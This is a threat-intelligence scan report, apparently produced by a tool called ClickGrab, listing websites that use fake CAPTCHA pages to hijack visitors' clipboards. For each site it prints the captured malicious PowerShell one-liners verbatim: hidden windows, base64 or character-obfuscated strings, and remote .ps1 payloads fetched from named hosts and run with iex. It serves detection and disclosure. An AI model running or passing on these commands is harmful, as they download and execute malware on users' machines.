ClickGrab Report - June 16, 2025

http://185.196.8.60/

20 indicators detected

Score: 90 PowerShell Clipboard Hijacking

1

powershell

1

clipboard

10

captcha

4

base64

1

high risk commands

💻 PowerShell Commands 1

powershell -w h powershell 'cu%%%r%l% %%http%%://safty%%%pl%%a%ce%.%c%%om/1%%5151%%%%.t%%%%x%%%t%%% |%%% %%%%iex%'.replace('%','')# Verification ID: 5932");

🔍 Suspicious Keywords 4

Verification ID

I'm not a robot

navigator.clipboard.writeText

📋 Clipboard Manipulation Code

...= ""; } function copyToClipboard() { navigator.clipboard.writeText ("powershell -w h powershell 'cu%%%r%l% %%http%%://sa...

https://riverview-pools.com/verify/index.html

27 indicators detected

Score: 90 PowerShell Clipboard Hijacking

2

powershell

3

clipboard

1

downloads

14

captcha

2

high risk commands

💻 PowerShell Commands 2

powershell " + htaPath;

iex (irm 'https://aatox.com/verify/45.ps1')

🔍 Suspicious Keywords 8

Command

✅

I am not a robot

Verification Hash

reCAPTCHA Verification

To better prove you are not a robot

I'm not a robot

🌐 Extracted URLs 5

https://use.fontawesome.com/releases/v5.0.0/css/all.css

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

https://www.google.com/intl/en/policies/privacy/

https://www.google.com/intl/en/policies/terms/

https://aatox.com/verify/45.ps1

📋 Clipboard Manipulation Code

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...

...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...

https://blessdayservices.org/up/

26 indicators detected

Score: 90 PowerShell Clipboard Hijacking

2

powershell

3

clipboard

3

downloads

14

captcha

4

high risk commands

💻 PowerShell Commands 2

powershell -ArgumentList '-w hidden -c iwr https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 | iex' -WindowStyle Hidden\"";

powershell " + htaPath;

🔍 Suspicious Keywords 7

✅

I am not a robot

Verification Hash

reCAPTCHA Verification

To better prove you are not a robot

I'm not a robot

🌐 Extracted URLs 5

https://use.fontawesome.com/releases/v5.0.0/css/all.css

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

https://www.google.com/intl/en/policies/privacy/

https://www.google.com/intl/en/policies/terms/

https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1

📋 Clipboard Manipulation Code

...); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...

...dy.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextAr...

https://jessespridecharters.com/v/

25 indicators detected

Score: 90 PowerShell Clipboard Hijacking

1

powershell

3

clipboard

3

downloads

14

captcha

3

high risk commands

💻 PowerShell Commands 1

powershell " + htaPath;

🔍 Suspicious Keywords 7

✅

I am not a robot

Verification Hash

reCAPTCHA Verification

To better prove you are not a robot

I'm not a robot

🌐 Extracted URLs 5

https://use.fontawesome.com/releases/v5.0.0/css/all.css

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

https://www.google.com/intl/en/policies/privacy/

https://www.google.com/intl/en/policies/terms/

https://yogasitesdev.wpengine.com/2/15.ps1

📋 Clipboard Manipulation Code

...); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...

...dy.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextAr...

https://mail.lucprofessional.com.br/

25 indicators detected

Score: 90 PowerShell Clipboard Hijacking

1

powershell

3

clipboard

1

downloads

12

captcha

1

base64

2

high risk commands

💻 PowerShell Commands 1

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;

🔍 Suspicious Keywords 8

✅

I am not a robot

Verification ID

reCAPTCHA Verification

Verify You Are Human

To better prove you are not a robot

I'm not a robot

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css

https://use.fontawesome.com/releases/v5.0.0/css/all.css

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...

...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...

https://test.peperoncinochepassione.it/

25 indicators detected

Score: 90 PowerShell Clipboard Hijacking

1

powershell

3

clipboard

1

downloads

12

captcha

1

base64

2

high risk commands

💻 PowerShell Commands 1

PowErsHeLL -W hiddEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex"`;

🔍 Suspicious Keywords 8

✅

I am not a robot

Verification ID

reCAPTCHA Verification

Verify You Are Human

To better prove you are not a robot

I'm not a robot

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css

https://use.fontawesome.com/releases/v5.0.0/css/all.css

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...

...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...

https://www.website.mypetapp.co.za/

25 indicators detected

Score: 90 PowerShell Clipboard Hijacking

1

powershell

3

clipboard

1

downloads

12

captcha

1

base64

2

high risk commands

💻 PowerShell Commands 1

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;

🔍 Suspicious Keywords 8

✅

I am not a robot

Verification ID

reCAPTCHA Verification

Verify You Are Human

To better prove you are not a robot

I'm not a robot

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css

https://use.fontawesome.com/releases/v5.0.0/css/all.css

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...

...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...

https://www.lucprofessional.grupomoltz.com.br/

25 indicators detected

Score: 90 PowerShell Clipboard Hijacking

1

powershell

3

clipboard

1

downloads

12

captcha

1

base64

2

high risk commands

💻 PowerShell Commands 1

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;

🔍 Suspicious Keywords 8

✅

I am not a robot

Verification ID

reCAPTCHA Verification

Verify You Are Human

To better prove you are not a robot

I'm not a robot

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css

https://use.fontawesome.com/releases/v5.0.0/css/all.css

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...

...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...

https://thesignaturemag.salviatech.com/

25 indicators detected

Score: 90 PowerShell Clipboard Hijacking

1

powershell

3

clipboard

1

downloads

12

captcha

1

base64

2

high risk commands

💻 PowerShell Commands 1

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;

🔍 Suspicious Keywords 8

✅

I am not a robot

Verification ID

reCAPTCHA Verification

Verify You Are Human

To better prove you are not a robot

I'm not a robot

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css

https://use.fontawesome.com/releases/v5.0.0/css/all.css

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...

...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...

https://www.bratusferramentas.grupomoltz.com.br/

25 indicators detected

Score: 90 PowerShell Clipboard Hijacking

1

powershell

3

clipboard

1

downloads

12

captcha

1

base64

2

high risk commands

💻 PowerShell Commands 1

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;

🔍 Suspicious Keywords 8

✅

I am not a robot

Verification ID

reCAPTCHA Verification

Verify You Are Human

To better prove you are not a robot

I'm not a robot

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css

https://use.fontawesome.com/releases/v5.0.0/css/all.css

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...

...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...

https://website.mypetapp.co.za/

25 indicators detected

Score: 90 PowerShell Clipboard Hijacking

1

powershell

3

clipboard

1

downloads

12

captcha

1

base64

2

high risk commands

💻 PowerShell Commands 1

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;

🔍 Suspicious Keywords 8

✅

I am not a robot

Verification ID

reCAPTCHA Verification

Verify You Are Human

To better prove you are not a robot

I'm not a robot

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css

https://use.fontawesome.com/releases/v5.0.0/css/all.css

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...

...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...

https://horno-rafelet.es/

25 indicators detected

Score: 90 PowerShell Clipboard Hijacking

1

powershell

3

clipboard

1

downloads

12

captcha

1

base64

2

high risk commands

💻 PowerShell Commands 1

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;

🔍 Suspicious Keywords 8

✅

I am not a robot

Verification ID

reCAPTCHA Verification

Verify You Are Human

To better prove you are not a robot

I'm not a robot

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css

https://use.fontawesome.com/releases/v5.0.0/css/all.css

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...

...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...

https://lucprofessional.grupomoltz.com.br/

25 indicators detected

Score: 90 PowerShell Clipboard Hijacking

1

powershell

3

clipboard

1

downloads

12

captcha

1

base64

2

high risk commands

💻 PowerShell Commands 1

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;

🔍 Suspicious Keywords 8

✅

I am not a robot

Verification ID

reCAPTCHA Verification

Verify You Are Human

To better prove you are not a robot

I'm not a robot

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css

https://use.fontawesome.com/releases/v5.0.0/css/all.css

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...

...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...

https://www.thesignaturemag.salviatech.com/

25 indicators detected

Score: 90 PowerShell Clipboard Hijacking

1

powershell

3

clipboard

1

downloads

12

captcha

1

base64

2

high risk commands

💻 PowerShell Commands 1

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;

🔍 Suspicious Keywords 8

✅

I am not a robot

Verification ID

reCAPTCHA Verification

Verify You Are Human

To better prove you are not a robot

I'm not a robot

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css

https://use.fontawesome.com/releases/v5.0.0/css/all.css

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...

...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...

https://www.test.peperoncinochepassione.it/

25 indicators detected

Score: 90 PowerShell Clipboard Hijacking

1

powershell

3

clipboard

1

downloads

12

captcha

1

base64

2

high risk commands

💻 PowerShell Commands 1

PowErsHeLL -W hiddEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex"`;

🔍 Suspicious Keywords 8

✅

I am not a robot

Verification ID

reCAPTCHA Verification

Verify You Are Human

To better prove you are not a robot

I'm not a robot

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css

https://use.fontawesome.com/releases/v5.0.0/css/all.css

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...

...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...

https://my.salviatech.com/

25 indicators detected

Score: 90 PowerShell Clipboard Hijacking

1

powershell

3

clipboard

1

downloads

12

captcha

1

base64

2

high risk commands

💻 PowerShell Commands 1

PowErsHeLL -W hiddEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex"`;

🔍 Suspicious Keywords 8

✅

I am not a robot

Verification ID

reCAPTCHA Verification

Verify You Are Human

To better prove you are not a robot

I'm not a robot

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css

https://use.fontawesome.com/releases/v5.0.0/css/all.css

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...

...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...

http://101.32.40.22/

20 indicators detected

Score: 90 Clipboard Hijacking Fake CAPTCHA

3

clipboard

11

captcha

🔍 Suspicious Keywords 6

✅

I am not a robot

Verification ID

reCAPTCHA Verification

I'm not a robot

🌐 Extracted URLs 4

https://use.fontawesome.com/releases/v5.0.0/css/all.css

https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

https://www.google.com/intl/en/policies/privacy/

https://www.google.com/intl/en/policies/terms/

📋 Clipboard Manipulation Code

...); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...

...dy.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextAr...

https://staplebrokenmetaliyro.blogspot.com/

55 indicators detected

Score: 90 Clipboard Hijacking Fake CAPTCHA

1

clipboard

47

captcha

🔍 Suspicious Keywords 7

\x3d

\x3c

\x22

\x3e

\x27

display:none

🌐 Extracted URLs 46

http://www.w3.org/1999/xhtml

http://www.google.com/2005/gml/b

http://www.google.com/2005/gml/data

http://www.google.com/2005/gml/expr

https://electricreport.org/ygd4g

📋 Clipboard Manipulation Code

...ync' src='https://www.gstatic.com/external_hosted/clipboardjs/clipboard.min.js'></script> <meta name='google-adsense-platform-account' content='ca-hos...

12

captcha

5

base64

🔍 Suspicious Keywords 4

_0x

atob(

document.write

12

captcha

4

base64

🔍 Suspicious Keywords 4

_0x

atob(

document.write

Threat Intelligence Report

Attack Pattern Analysis

Malicious Sites Detected

💻 PowerShell Commands 1

🔍 Suspicious Keywords 4

📋 Clipboard Manipulation Code

💻 PowerShell Commands 2

🔍 Suspicious Keywords 8

🌐 Extracted URLs 5

📋 Clipboard Manipulation Code

💻 PowerShell Commands 2

🔍 Suspicious Keywords 7

🌐 Extracted URLs 5

📋 Clipboard Manipulation Code

💻 PowerShell Commands 1

🔍 Suspicious Keywords 7

🌐 Extracted URLs 5

📋 Clipboard Manipulation Code

💻 PowerShell Commands 1

🔍 Suspicious Keywords 8

🌐 Extracted URLs 3

📋 Clipboard Manipulation Code

💻 PowerShell Commands 1

🔍 Suspicious Keywords 8

🌐 Extracted URLs 3

📋 Clipboard Manipulation Code

💻 PowerShell Commands 1

🔍 Suspicious Keywords 8

🌐 Extracted URLs 3

📋 Clipboard Manipulation Code

💻 PowerShell Commands 1

🔍 Suspicious Keywords 8

🌐 Extracted URLs 3

📋 Clipboard Manipulation Code

💻 PowerShell Commands 1

🔍 Suspicious Keywords 8

🌐 Extracted URLs 3

📋 Clipboard Manipulation Code

💻 PowerShell Commands 1

🔍 Suspicious Keywords 8

🌐 Extracted URLs 3

📋 Clipboard Manipulation Code

💻 PowerShell Commands 1

🔍 Suspicious Keywords 8

🌐 Extracted URLs 3

📋 Clipboard Manipulation Code

💻 PowerShell Commands 1

🔍 Suspicious Keywords 8

🌐 Extracted URLs 3

📋 Clipboard Manipulation Code

💻 PowerShell Commands 1

🔍 Suspicious Keywords 8

🌐 Extracted URLs 3

📋 Clipboard Manipulation Code

💻 PowerShell Commands 1

🔍 Suspicious Keywords 8

🌐 Extracted URLs 3

📋 Clipboard Manipulation Code

💻 PowerShell Commands 1

🔍 Suspicious Keywords 8

🌐 Extracted URLs 3

📋 Clipboard Manipulation Code

💻 PowerShell Commands 1

🔍 Suspicious Keywords 8

🌐 Extracted URLs 3

📋 Clipboard Manipulation Code

🔍 Suspicious Keywords 6

🌐 Extracted URLs 4

📋 Clipboard Manipulation Code

🔍 Suspicious Keywords 7

🌐 Extracted URLs 46

📋 Clipboard Manipulation Code

🔍 Suspicious Keywords 4

🔍 Suspicious Keywords 4

Technical Analysis

ClickGrab Threat Analysis Report - 2025-06-16

Executive Summary

Domain Analysis

Most Frequently Encountered Domains

URL Pattern Analysis